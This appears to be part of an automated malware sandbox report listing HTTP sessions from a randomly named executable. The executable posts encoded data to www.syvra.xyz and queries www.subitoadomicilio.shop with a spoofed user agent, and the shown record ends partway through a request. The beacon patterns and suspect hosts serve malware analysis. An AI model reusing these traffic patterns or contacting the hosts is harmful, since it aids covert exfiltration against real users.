                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.450405195.24.68.25803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:43.373795033 CEST491OUTGET /x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.subitoadomicilio.shop
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:44.114605904 CEST591INHTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:43 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.450406162.0.213.94803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:49.681596041 CEST733OUTPOST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 35 47 68 77 38 57 34 4d 35 6a 56 4b 68 34 74 76 69 6f 69 6f 70 4f 39 43 7a 4f 73 53 5a 42 78 71 4f 72 79 63 47 4d 69 59 31 42 31 64 30 30 49 36 48 66 56 4b 68 30 37 4c 79 67 75 79 4a 56 4d 78 6a 61 64 75 61 78 65 79 73 6c 43 6a 56 73 43 7a 77 61 76 4f 55 33 31 78 69 4d 33 72 6b 73 41 32 59 48 70 68 66 77 39 64 53 46 77 51 70 7a 31 62 72 54 6f 63 53 36 54 51 58 6f 39 51 57 5a 33 68 6d 48 55 4c 47 44 54 73 49 77 42 47 70 71 6a 47 73 65 38 66 5a 36 63 78 68 42 34 4b 4f 70 4e 47 58 30 55 70 58 2f 76 53 6f 6e 68 4d 39 48 2f 73 4d 66 6e 2b 4d 77 3d 3d
                      Data Ascii: MtXH8dRH=nLi3hk6LsWGq5Ghw8W4M5jVKh4tvioiopO9CzOsSZBxqOrycGMiY1B1d00I6HfVKh07LyguyJVMxjaduaxeyslCjVsCzwavOU31xiM3rksA2YHphfw9dSFwQpz1brTocS6TQXo9QWZ3hmHULGDTsIwBGpqjGse8fZ6cxhB4KOpNGX0UpX/vSonhM9H/sMfn+Mw==
                      Sep 13, 2024 12:27:50.249691963 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:50 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:50.249742031 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                      Sep 13, 2024 12:27:50.249793053 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                      Sep 13, 2024 12:27:50.249829054 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                      Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                      Sep 13, 2024 12:27:50.249861956 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                      Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                      Sep 13, 2024 12:27:50.249897003 CEST448INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                      Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                      Sep 13, 2024 12:27:50.249969959 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                      Sep 13, 2024 12:27:50.250005007 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                      Sep 13, 2024 12:27:50.250052929 CEST1236INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                      Sep 13, 2024 12:27:50.250144005 CEST672INData Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20
                      Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
                      Sep 13, 2024 12:27:50.255011082 CEST1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.450407162.0.213.94803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:52.324922085 CEST753OUTPOST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.syvra.xyz/h2bb/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 33 42 71 50 4f 57 63 48 4a 4f 59 32 42 31 64 73 6b 49 2f 4a 2f 55 6e 68 30 32 2b 79 68 53 79 4a 56 49 78 6a 66 68 75 61 43 6d 78 74 31 43 39 5a 4d 43 39 2f 36 76 4f 55 33 31 78 69 4d 7a 42 6b 71 6f 32 59 58 5a 68 65 52 39 63 54 46 77 66 6a 54 31 62 68 44 6f 51 53 36 54 49 58 70 68 36 57 63 72 68 6d 47 6b 4c 47 33 48 74 42 77 41 50 6b 4b 69 45 67 65 5a 68 66 37 74 61 6b 7a 55 5a 48 4b 59 72 66 53 46 7a 47 4f 4f 46 36 6e 46 2f 67 41 32 59 42 63 61 33 58 78 4f 38 49 52 44 69 39 50 4c 54 72 78 31 66 41 46 6b 77 62 76 4d 3d
                      Data Ascii: MtXH8dRH=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za3BqPOWcHJOY2B1dskI/J/Unh02+yhSyJVIxjfhuaCmxt1C9ZMC9/6vOU31xiMzBkqo2YXZheR9cTFwfjT1bhDoQS6TIXph6WcrhmGkLG3HtBwAPkKiEgeZhf7takzUZHKYrfSFzGOOF6nF/gA2YBca3XxO8IRDi9PLTrx1fAFkwbvM=
                      Sep 13, 2024 12:27:52.895612955 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:52 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:52.895661116 CEST224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                      Sep 13, 2024 12:27:52.895693064 CEST1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                      Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                      Sep 13, 2024 12:27:52.895742893 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                      Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                      Sep 13, 2024 12:27:52.895792961 CEST1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                      Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                      Sep 13, 2024 12:27:52.895831108 CEST1236INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                      Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                      Sep 13, 2024 12:27:52.895844936 CEST1236INData Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c
                      Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
                      Sep 13, 2024 12:27:52.895876884 CEST552INData Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32
                      Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
                      Sep 13, 2024 12:27:52.895916939 CEST1236INData Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                      Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                      Sep 13, 2024 12:27:52.895946026 CEST224INData Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                      Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
                      Sep 13, 2024 12:27:52.901026964 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                      Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.450408162.0.213.94803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:54.873523951 CEST10835OUTPOST /h2bb/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.syvra.xyz
                      Origin: http://www.syvra.xyz
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
